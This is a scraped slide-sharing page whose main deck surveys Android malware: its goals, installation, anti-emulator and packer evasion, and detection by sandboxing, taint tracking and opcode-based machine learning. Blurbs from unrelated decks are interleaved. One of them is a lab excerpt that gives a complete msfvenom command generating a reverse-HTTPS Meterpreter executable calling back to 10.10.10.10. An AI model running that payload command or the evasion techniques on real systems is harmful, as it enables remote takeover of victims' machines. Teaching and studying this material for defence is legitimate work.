This document summarizes information about Android malware, including its goals, installation methods, evasion techniques, and detection methods. Some key points:
- Malware goals include sending premium SMS, stealing banking info, adware click fraud, and ransomware. It can also mine bitcoin or exfiltrate personal data.
- It installs via repackaged apps, update attacks, drive-by downloads, or by misusing accessibility services. Packers encrypt the APK to evade detection.
- Evasion techniques include dynamic C&C domains, encryption, reflection, delaying attacks, and polymorphism/metamorphism. It also checks for emulators or debuggers.
- Detection analy
Password Cracking is a technique to gain the access to an organisation.
In this slide, I will tell you the possible ways of cracking and do a live example for Gmail Password Cracking.
Password Cracking is a technique to gain the access to an organisation.
In this slide, I will tell you the possible ways of cracking and do a live example for Gmail Password Cracking.
Fast detection of Android malware: machine learning approachYury Leonychev
This is a my presentation for YaC 2013 about machine learning based system for fast classification of Android applications. Covered themes: how to find malware around thousands of applications in Store.
I was invited in Web Tech Talk Event as a Speaker. The event was organized by Tech Speakers Bangladesh. On that event, I gave a speech on Deep and Dark Web. I made this slide for that speech.
This presentation will cover all you need to know about mobile and application device security.
With an introduction, threats, applications, security, and useful tips for people who need to know
So, let's get started. If you enjoy this and find the information beneficial, please like and share it with your friends.
Introduction to Cyber Crime is very necessary and useful for Forensic Science students serving in the cybercrime field and also useful for the general public. Types and Examples of Cyber Crime, How to prevent and report cybercrime, investigating cybercrime.
Discusses how to perform malware analysis on Android devices. Initially presented at BSidesDE 2011 (in a much more fun format), the version here is as-presented at Rochester Security Summit 2011.
Fast detection of Android malware: machine learning approachYury Leonychev
This is a my presentation for YaC 2013 about machine learning based system for fast classification of Android applications. Covered themes: how to find malware around thousands of applications in Store.
I was invited in Web Tech Talk Event as a Speaker. The event was organized by Tech Speakers Bangladesh. On that event, I gave a speech on Deep and Dark Web. I made this slide for that speech.
This presentation will cover all you need to know about mobile and application device security.
With an introduction, threats, applications, security, and useful tips for people who need to know
So, let's get started. If you enjoy this and find the information beneficial, please like and share it with your friends.
Introduction to Cyber Crime is very necessary and useful for Forensic Science students serving in the cybercrime field and also useful for the general public. Types and Examples of Cyber Crime, How to prevent and report cybercrime, investigating cybercrime.
Discusses how to perform malware analysis on Android devices. Initially presented at BSidesDE 2011 (in a much more fun format), the version here is as-presented at Rochester Security Summit 2011.
Remote Exploitation of the Dropbox SDK for AndroidIBM Security
The IBM X-Force Application Security Research Team has discovered a vulnerability in the Dropbox SDK for Android (CVE-2014-8889) which allows attackers to connect applications on mobile devices to a Dropbox account controlled by the attacker without the victim's knowledge or authorization. This is a serious flaw in the authentication mechanism within any Android app using a Dropbox SDK Version 1.5.4 through 1.6.1
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
Compiled some Open source and other tools that I that I have used for BEC/EAC protection, security, & training. I had a great time sitting on the panel with other members.
Stephanie Vanroelen - Mobile Anti-Virus apps exposedNoNameCon
Talk by Stephanie Vanroelen at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/ZFJFW8/
This talk is about top anti-virus apps on Mobile. An in depth look on how they work and what they do. Do they add to or break the security of the mobile OS?
This talk is about top anti-virus apps on Android. An in-depth look at how they work and what they do.
The focus will be on the top 5 android apps:
Kaspersky Mobile Antivirus
Avast Mobile Security
Norton Security & Antivirus
Sophos Mobile Security
Security Master
This talk will try to answer the following questions: Do they add to or break the security of the Android sandbox system? What type of information is being shared back to the company (if any)? Are these apps well built?
Finally, I will address the following: Do I recommend any of these apps and if so which one and why?
When developers api simplify user mode rootkits development – part iiYury Chemerkin
This series of articles is about the ease of which user-mode rootkits for BlackBerry can be developed. In a previous article, several cases were mentioned along with ideas on how a mobile rootkit could easily be built on the application level by exploiting API and privilege escalation vulnerabilities or oversight. Cases covered the top trojans for two years with the first one being Android Plankton. Instead of giving access to hidden levels of this popular game, malware sends information about the device to criminals and downloads other malicious programs.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
Multiple Vulnerabilities in Mozilla Firefox for AndroidThe Hacker News
Multiple Vulnerabilities in Firefox for Android, reported by IBM Security researchers.
1. (CVE-2014-1516) Profile Directory Name Weak Randomization.
2. (CVE-2014-1484) Profile Directory Name Leaks to Android System Log.
3. (CVE-2014-1515) Automatic File Download to SD Card.
4. (CVE-2014-1506) Crash Reporter File Manipulation.
More Details: http://thehackernews.com/2014/03/multiple-de-in-firefox-for-android-leak.html
Overtaking Firefox Profiles: Vulnerabilities in Firefox for AndroidIBM Security
Abstract|We present newly-found vulnerabilities in the Firefox Android Application. Exploiting them allows a malicious application to successfully derandomize the Firefox prole directory name in a practical amount of time and exltrate sensitive data (such as cookies and cached information) which reside in that directory, breaking Android's sandbox.
When developer's api simplify user mode rootkits developing.Yury Chemerkin
This is a series of articles about shell extensions that enhance high-level features of any operation system. However, such possibilities not only enrich platform but simplify developing trojans, exploits that leads to the new security holes. Mostly this kind of extensions are known as usermode rootkits.
http://hakin9.org/theultimat/
https://hasgeek.com/rootconf/data-privacy-conference/sub/synthetic-data-generation-VN92QpTzvTSAeepCW8YRMU
Synthetic data generation for relational data
per column density estimation
covariance
copula
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Globus
Large Language Models (LLMs) are currently the center of attention in the tech world, particularly for their potential to advance research. In this presentation, we'll explore a straightforward and effective method for quickly initiating inference runs on supercomputers using the vLLM tool with Globus Compute, specifically on the Polaris system at ALCF. We'll begin by briefly discussing the popularity and applications of LLMs in various fields. Following this, we will introduce the vLLM tool, and explain how it integrates with Globus Compute to efficiently manage LLM operations on Polaris. Attendees will learn the practical aspects of setting up and remotely triggering LLMs from local machines, focusing on ease of use and efficiency. This talk is ideal for researchers and practitioners looking to leverage the power of LLMs in their work, offering a clear guide to harnessing supercomputing resources for quick and effective LLM inference.
Developing Distributed High-performance Computing Capabilities of an Open Sci...Globus
COVID-19 had an unprecedented impact on scientific collaboration. The pandemic and its broad response from the scientific community has forged new relationships among public health practitioners, mathematical modelers, and scientific computing specialists, while revealing critical gaps in exploiting advanced computing systems to support urgent decision making. Informed by our team’s work in applying high-performance computing in support of public health decision makers during the COVID-19 pandemic, we present how Globus technologies are enabling the development of an open science platform for robust epidemic analysis, with the goal of collaborative, secure, distributed, on-demand, and fast time-to-solution analyses to support public health.
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERRORTier1 app
Even though at surface level ‘java.lang.OutOfMemoryError’ appears as one single error; underlyingly there are 9 types of OutOfMemoryError. Each type of OutOfMemoryError has different causes, diagnosis approaches and solutions. This session equips you with the knowledge, tools, and techniques needed to troubleshoot and conquer OutOfMemoryError in all its forms, ensuring smoother, more efficient Java applications.
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Globus
The U.S. Geological Survey (USGS) has made substantial investments in meeting evolving scientific, technical, and policy driven demands on storing, managing, and delivering data. As these demands continue to grow in complexity and scale, the USGS must continue to explore innovative solutions to improve its management, curation, sharing, delivering, and preservation approaches for large-scale research data. Supporting these needs, the USGS has partnered with the University of Chicago-Globus to research and develop advanced repository components and workflows leveraging its current investment in Globus. The primary outcome of this partnership includes the development of a prototype enterprise repository, driven by USGS Data Release requirements, through exploration and implementation of the entire suite of the Globus platform offerings, including Globus Flow, Globus Auth, Globus Transfer, and Globus Search. This presentation will provide insights into this research partnership, introduce the unique requirements and challenges being addressed and provide relevant project progress.
A Comprehensive Look at Generative AI in Retail App Testing.pdfkalichargn70th171
Traditional software testing methods are being challenged in retail, where customer expectations and technological advancements continually shape the landscape. Enter generative AI—a transformative subset of artificial intelligence technologies poised to revolutionize software testing.
Check out the webinar slides to learn more about how XfilesPro transforms Salesforce document management by leveraging its world-class applications. For more details, please connect with sales@xfilespro.com
If you want to watch the on-demand webinar, please click here: https://www.xfilespro.com/webinars/salesforce-document-management-2-0-smarter-faster-better/
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdfJay Das
With the advent of artificial intelligence or AI tools, project management processes are undergoing a transformative shift. By using tools like ChatGPT, and Bard organizations can empower their leaders and managers to plan, execute, and monitor projects more effectively.
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteGoogle
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
👉👉 Click Here To Get More Info 👇👇
https://sumonreview.com/ai-pilot-review/
AI Pilot Review: Key Features
✅Deploy AI expert bots in Any Niche With Just A Click
✅With one keyword, generate complete funnels, websites, landing pages, and more.
✅More than 85 AI features are included in the AI pilot.
✅No setup or configuration; use your voice (like Siri) to do whatever you want.
✅You Can Use AI Pilot To Create your version of AI Pilot And Charge People For It…
✅ZERO Manual Work With AI Pilot. Never write, Design, Or Code Again.
✅ZERO Limits On Features Or Usages
✅Use Our AI-powered Traffic To Get Hundreds Of Customers
✅No Complicated Setup: Get Up And Running In 2 Minutes
✅99.99% Up-Time Guaranteed
✅30 Days Money-Back Guarantee
✅ZERO Upfront Cost
See My Other Reviews Article:
(1) TubeTrivia AI Review: https://sumonreview.com/tubetrivia-ai-review
(2) SocioWave Review: https://sumonreview.com/sociowave-review
(3) AI Partner & Profit Review: https://sumonreview.com/ai-partner-profit-review
(4) AI Ebook Suite Review: https://sumonreview.com/ai-ebook-suite-review
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Anthony Dahanne
Les Buildpacks existent depuis plus de 10 ans ! D’abord, ils étaient utilisés pour détecter et construire une application avant de la déployer sur certains PaaS. Ensuite, nous avons pu créer des images Docker (OCI) avec leur dernière génération, les Cloud Native Buildpacks (CNCF en incubation). Sont-ils une bonne alternative au Dockerfile ? Que sont les buildpacks Paketo ? Quelles communautés les soutiennent et comment ?
Venez le découvrir lors de cette session ignite
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisGlobus
JASMIN is the UK’s high-performance data analysis platform for environmental science, operated by STFC on behalf of the UK Natural Environment Research Council (NERC). In addition to its role in hosting the CEDA Archive (NERC’s long-term repository for climate, atmospheric science & Earth observation data in the UK), JASMIN provides a collaborative platform to a community of around 2,000 scientists in the UK and beyond, providing nearly 400 environmental science projects with working space, compute resources and tools to facilitate their work. High-performance data transfer into and out of JASMIN has always been a key feature, with many scientists bringing model outputs from supercomputers elsewhere in the UK, to analyse against observational or other model data in the CEDA Archive. A growing number of JASMIN users are now realising the benefits of using the Globus service to provide reliable and efficient data movement and other tasks in this and other contexts. Further use cases involve long-distance (intercontinental) transfers to and from JASMIN, and collecting results from a mobile atmospheric radar system, pushing data to JASMIN via a lightweight Globus deployment. We provide details of how Globus fits into our current infrastructure, our experience of the recent migration to GCSv5.4, and of our interest in developing use of the wider ecosystem of Globus services for the benefit of our user community.
Code reviews are vital for ensuring good code quality. They serve as one of our last lines of defense against bugs and subpar code reaching production.
Yet, they often turn into annoying tasks riddled with frustration, hostility, unclear feedback and lack of standards. How can we improve this crucial process?
In this session we will cover:
- The Art of Effective Code Reviews
- Streamlining the Review Process
- Elevating Reviews with Automated Tools
By the end of this presentation, you'll have the knowledge on how to organize and improve your code review proces
top nidhi software solution freedownloadvrstrong314
This presentation emphasizes the importance of data security and legal compliance for Nidhi companies in India. It highlights how online Nidhi software solutions, like Vector Nidhi Software, offer advanced features tailored to these needs. Key aspects include encryption, access controls, and audit trails to ensure data security. The software complies with regulatory guidelines from the MCA and RBI and adheres to Nidhi Rules, 2014. With customizable, user-friendly interfaces and real-time features, these Nidhi software solutions enhance efficiency, support growth, and provide exceptional member services. The presentation concludes with contact information for further inquiries.
Globus Connect Server Deep Dive - GlobusWorld 2024Globus
We explore the Globus Connect Server (GCS) architecture and experiment with advanced configuration options and use cases. This content is targeted at system administrators who are familiar with GCS and currently operate—or are planning to operate—broader deployments at their institution.
Experience our free, in-depth three-part Tendenci Platform Corporate Membership Management workshop series! In Session 1 on May 14th, 2024, we began with an Introduction and Setup, mastering the configuration of your Corporate Membership Module settings to establish membership types, applications, and more. Then, on May 16th, 2024, in Session 2, we focused on binding individual members to a Corporate Membership and Corporate Reps, teaching you how to add individual members and assign Corporate Representatives to manage dues, renewals, and associated members. Finally, on May 28th, 2024, in Session 3, we covered questions and concerns, addressing any queries or issues you may have.
For more Tendenci AMS events, check out www.tendenci.com/events
Into the Box Keynote Day 2: Unveiling amazing updates and announcements for modern CFML developers! Get ready for exciting releases and updates on Ortus tools and products. Stay tuned for cutting-edge innovations designed to boost your productivity.
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...informapgpstrackings
Keep tabs on your field staff effortlessly with Informap Technology Centre LLC. Real-time tracking, task assignment, and smart features for efficient management. Request a live demo today!
For more details, visit us : https://informapuae.com/field-staff-tracking/
We describe the deployment and use of Globus Compute for remote computation. This content is aimed at researchers who wish to compute on remote resources using a unified programming interface, as well as system administrators who will deploy and operate Globus Compute services on their research computing infrastructure.
2. Goal of malware
Send SMS to premium-rate numbers
Bank : steal account info and money
Adware : click fraud
Spyware : Exfiltrate personal info like location, phone info, contact list,
etc.
Ransomware
Bitcoin mining
2
3. Installation methods
1. Repackaging : Download and decompile a popular App. Add
malicious payload. Upload to some other “app store” for download.
Upload a benign app to Playstore. Upload new malware version of
same app to third-party “app store”. Since both apps share same
certificate, app will get updated on device (Trendmicro blog).
2. Update attack : Insert only the update component in the App.
Download the actual malware payload at runtime.
3. Drive-by download : Using QR code, SMS link, Social media link,
Bluetooth, USB.
3
4. Malicious install of an APK
1. Root exploit
2. Misuse Android Accessibility services
3. Create confusion through popups and look-alikes
4. Prevent removal by storing in system partition
Grabos (McAfee)
https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-grabo
s-exposed-millions-to-pay-per-install-scam-on-google-play/
4
5. PC to mobile infection
Android.Claco: Runs on the Mobile device. Downloads Windows
executable and places it in the root directory of the SD card. When the
mobile device is connected to a PC, and if the AutoRun feature is
enabled, Windows will automatically execute the malicious file.
Trojan.Droidpak: Runs on Windows as system service. Downloads
malware APK and even “adb”. Attempts to install the APK on the
connected Mobile (if USB debugging Mode is On).
5
6. Loopholes in Google Playstore
Innovation by Android.dvmap
“To bypass Google Play Store security checks, the malware creators
used a very interesting method: they uploaded a clean app to the store
at the end of March, 2017, and would then update it with a malicious
version for short period of time. Usually they would upload a clean
version back on Google Play the very same day. They did this at least 5
times between 18 April and 15 May. “
https://securelist.com/dvmap-the-first-android-malware-with-code-inject
ion/78648/
6
8. Top permissions asked by Malware
Unless you have a root exploit, you require “Permissions” in the
Manifest.
1. Internet
2. Access_network_state
3. read/write external storage
4. Read phone state
5. Access wifi state
6. Access coarse/fine location
7. Read/write contacts
8
9. How to create overlay windows
Bank malware needs to overlay a window which resembles the bank
login website.
Ways to achieve this overlay:
1. Use permission SYSTEM_ALERT_WINDOW.
2. Seek permission to use “Accessibility services” which allows access
to UI of other running apps, and create overlays. (Used by SvPeng)
3. Use “TOAST” notification to create full-screen window (on pre-Oreo).
See “Toast overlay attack” in Sept 2017.
9
10. Botnets
Evolution of Command and Control (C&C) architecture
1. First generation had single C&C server
2. Semi-distributed
3. Peer-to-peer
To avoid hard-coded URLs, C&C URL is generated using domain name
generation (DGA) seeded by current date. Or the C&C is a twitter
account whose name is generated dynamically (e.g. twikabot). Bot
then decrypts and executes tweets.
Rapidly rotate the IP address of the C&C server : “Fast flux botnet”.
10
11. Evade detection by anti-malware tools
1. All constant strings in APK are encrypted
2. Use of Base64 encoding
3. Network traffic is encrypted
4. Call via reflection; decrypt class and method names just before call
5. Decryption key is not hard-coded but derived at runtime
6. Hide payload inside images folder
7. Use Android Packers or Protectors
8. Alter behaviour when running inside Emulator
9. Modify the code at runtime to evade static signatures (metamorphic
malware).
11
12. Hide the payload inside an image
PNG file has many chunks, each with its header and length
If a chunk has an unknown header, the PNG reader will skip it
PNG with a legitimate image (app icon) can contain malware
(encrypted)
Load malware payload from chunk, decrypt and run using
DexClassLoader
Anomaly : Look for a small image having large size !
12
Axelle Apvrille. Hide Android Applications in Images. Blackhat Europe 2014
13. Packers and Protectors
Top packers : Bangcle, APKProtect.com, Baidu, Tencent
● Encrypts the APK and stores it in assets folder
● Replaces the APK Main Activity by their own
● Inserts it own decryption library (native C)
● During run, decrypts your APK in the RAM and runs it
Packers developed to protect vendor IP, but being misused to distribute
malware.
Packed APK cannot be detected by static or dynamic analysis.
13
16. Emulator evasion techniques-1
deviceID, phonenumber, IMEI, IMSI are faked on emulator
● TelephonyManager.getDeviceId().equals(“00000…”)
● TelephonyManager.getSimCountryIso().equals(“Android”)
● TelephonyManager.getSimOperatorName().equals(“Android”)
● TelephonyManager.getLine1Number().equals(“15555215554”)
where 15555521 is a constant, and emulator port number is 5554
https://news.sophos.com/en-us/2017/04/13/android-malware-anti-emulation-techniques/
16
17. Emulator evasion techniques-2
Inside emulator, the build info is set to fake values
● BUILD.MODEL contains either “google_sdk”, “Emulator”, “Android
SDK”.
● BUILD.FINGERPRINT starts with “generic”, “unknown”
● BUILD.MANUFACTURER contains “Genymotion”
● BUILD.BRAND starts with “generic”
● BUILD.DEVICE starts with “generic”
17
18. Emulator evasion techniques-3
Emulator properties give it away
1. System properties “ro.bootloader”, “ro.bootmode”, “ro.hardware”,
“ro.product.mode”, etc are set to “Unknown”, “generic”, “sdk” etc.
2. Emulator related files exist : “/dev/socket/qemud”,
“/system/lib/libc_malloc_debug_qemu.so”, “/sys/qemu_trace”,
“/system/bin/qemu-props”.
3. getInstallerPackageName() = “com.android.vending” (i.e. app was
installed using “adb”).
4. Check if user’s email address contains “google”, “tester”, etc.
18
19. Detect if running in debugger
Check Debug.isDebuggerConnected(), Debug.waitingForDebugger()
Launch multiple threads and let one thread attach to another using
ptrace(), because a process can only be attached by one process.
[Packergrind paper]
19
20. Delay the attack
Delay the attack by fixed time (e.g. 24 hours) which is long enough to
beat sandbox testing.
Launch malware only when Google Play is launched, by adding the
application’s main intent to the the category
“android.intent.category.APPMARKET”. (done by “Tascudap”)
20
21. Polymorphic and metamorphic malware
Oligomorphic :
Polymorphic
● Use of encryption for strings, payloads; Data append/prepend
Metamorphic (hard to detect using file signatures)
1. Reorder instructions or data structures
2. Add Semantic NOPs
3. Register reassignment
21
https://reverseengineering.stackexchange.com/questions/1696/what-are-the-differences-between-
metamorphic-oligomorphic-and-polymorphic-malwa
25. Static analysis
Check
● Uses-feature in Manifest
● Permissions in Manifest
● Intents
● Use of DexClassLoader, NDK Loadlib
● Use of crypto API
● OS system calls
● Receiving broadcasts
25
26. Dynamic Analysis
Run APK in Sandbox - e.g. DroidBox, Andrubis
Record
1. API calls
2. OS system calls
3. Network traffic
4. Battery consumption
5. CPU usage
26
27. Network monitoring
Malware tends to use DNS, HTTP (OkHttp), IRC, and TOR !
1. DNS query may be used to locate C&C server.
2. Why OkHttp? It can contact multiple alternative HTTP servers, and
retries silently and periodically in case of failure.
3. IRC is popular because it supports redundancy (multi-master), has
builtin login protocol, and offers full 2-way communication.
4. TOR : Difficult to shutdown a botnet using TOR, as you cannot de-
anonymize the C&C server sitting inside TOR network.
5. App may not request Internet permissions but use other apps like
browser to send/recv data over network
27
28. Dynamic Analysis - Andrubis
Andrubis does “Stimulation” instead of passive wait or UI exploration.
1. Invoke all Activities (not just Main) found in the Manifest
2. Patch Android ActivityManager to start all background services
automatically.
3. Intercept calls to “registerReceiver” and use ActivityManager to
invoke them.
4. Broadcast common events such as SMS, WiFi+3G connectivity, GPS
lock, phone calls, phone state changes to trigger OS and App
behaviour.
Andrubis is now commercial - Lastline
[Weichselbaum, et al. Andrubis. Android Malware under the magnifying glass ]
28
29. TaintDroid
Leverages Android virtualized env. Assumes no app is trusted.
It labels (taints) data from privacy-sensitive sources
Transitively applies labels as sensitive data propagates through program
variables, files, and interprocess messages.
When tainted data are transmitted over the network, or otherwise leave
the system, TaintDroid logs the data’s labels, the application responsible
for transmitting the data, and the data’s destination.
[Enck, et al. TaintDroid - OSDI 2010]
29
31. Beat the malware’s emulator detection
Make the emulator look like a real device
● Set geo-location : “adb emu geo fix longitude latitude altitude”
● Change hard-coded IMEI and ISMI in the emulator binary
● Set emulator port to be other than 5554 or 5584.
● Use “genymotion” - which apparently has addressed all these issues
Axelle Apvrille. Android malware reverse engineering
31
32. How to beat the Packers
Some packers decrypt the original APK at known locations in RAM. Use
that to find and analyze the decrypted APK at runtime.
[ Strazzere talk at Defcon 14 https://github.com/strazzere/android-unpacker ]
DexHunter modified Dalvik runtime(ART/OAT) to trap ClassLoader.
[ Zhang, et al. DexHunter ESORICS 2015 https://github.com/zyq8709/DexHunter ]
PackerGrind
[ Xue, et al. Adaptive Unpacking of Android Apps ]
DaBID Debugger [Blackhat Asia 2015]
32
33. Opcode analysis
Classify apps according to n-grams of opcodes in the APK.
Dalvik has 218 unique opcodes
Split the opcodes at class method boundaries before creating n-grams.
Strip the opcode arguments (operands)
Here, 1-gram is just a histogram of frequencies
This method works with obfuscated code !
33
34. ML model over opcode sequences
ML : the holy grail !
Treat opcode sequence as text.
Formulate malware recognition as an NLP problem.
Feed the opcode sequence to a Neural Net.
System dynamically learns the length of the n-gram which is most
relevant.
[ McLaughlin et al. Deep Android Malware Detection. ODASPY 2017 ]
34
35. ML model over API or OS calls
These require first running the App in an emulator to capture dynamic
behaviour.
Malware may not exhibit all the malicious behaviour during test.
35
36. Baidu Appstore
Baidu has ACS which is equivalent of Google’s Bouncer
They offer an APK Protector (http://apkprotect.baidu.com)
Evolution of their anti-malware strategy
1. Signature-based rules
2. Behaviour-based rules
3. Opcode-based rules
4. As of 2016 : Deep learning model called “AlphaAv”
Thomas Wang (Baidu). AI Based An*virus. Blackhat 2016
36
37. Baidu Appstore
AlphaAv ML model extracts features from APK
1. Permissions in Manifest.
2. Number of picture files in /res
3. Number of fields of type “boolean”
4. Number of methods with parameters > 20
5. Has executable file in /res ?
6. Has apk file in /assets ?
7. Registers for DEVICE_ADMIN_ENABLED broadcast and has
sendSMSmessage permission
37
38. Google Playstore
Components
1. Bouncer : test submitted apps in Google Cloud
2. Verify Apps : runs on device. Warn or block installation of harmful
apps; continuously scan apps running on device; kill malware apps
remotely.
3. SafetyNet : privacy preserving IDS.
4. SafetyNet Attestation : determine if the device is CTS compatible
5. Android Device Manager : locate a stolen or lost device
6. Android Update service : deliver updates to the device through web
or OTA.
38
39. Google Playstore
Vertical monitoring : Check if runtime behaviour differs from upload-
time (testing) behaviour ?
Lateral Monitoring : How does the same App work across all the
devices ? A device that fails to perform the periodic “Verify Apps”
check after an App install is flagged as DOI (Dead or Insecure)
The “Verify Apps” service computes a DOI score of each App. All Apps
should have DOI score in same range.
https://android-developers.googleblog.com/2017/01/findingmalware.html
39
40. Malware detection tools
Urlvoid : check if a URL is blacklisted.
VirusTotal (owned by Alphabet) : collaborative platform. Your
submitted APK is checked against large number of malware engines -
McAfee, AVG, TrendMicro.
Koodous : another collaborative platform
40
41. Resources
1. Conferences : Blackhat, DefCon, RSA, IEEE Security & Privacy,
USENIX Security, ACM. Also see uploaded videos of past
conferences.
2. https://github.com/ashishb/android-security-awesome
41
42. Malware detection
Theoretical result by Fred Cohen
The “virus detection” problem can be reduced to the “halting problem”
- hence undecidable whether a program has a virus.
Therefore, Anti-virus algorithms are essentially probabilistic.
42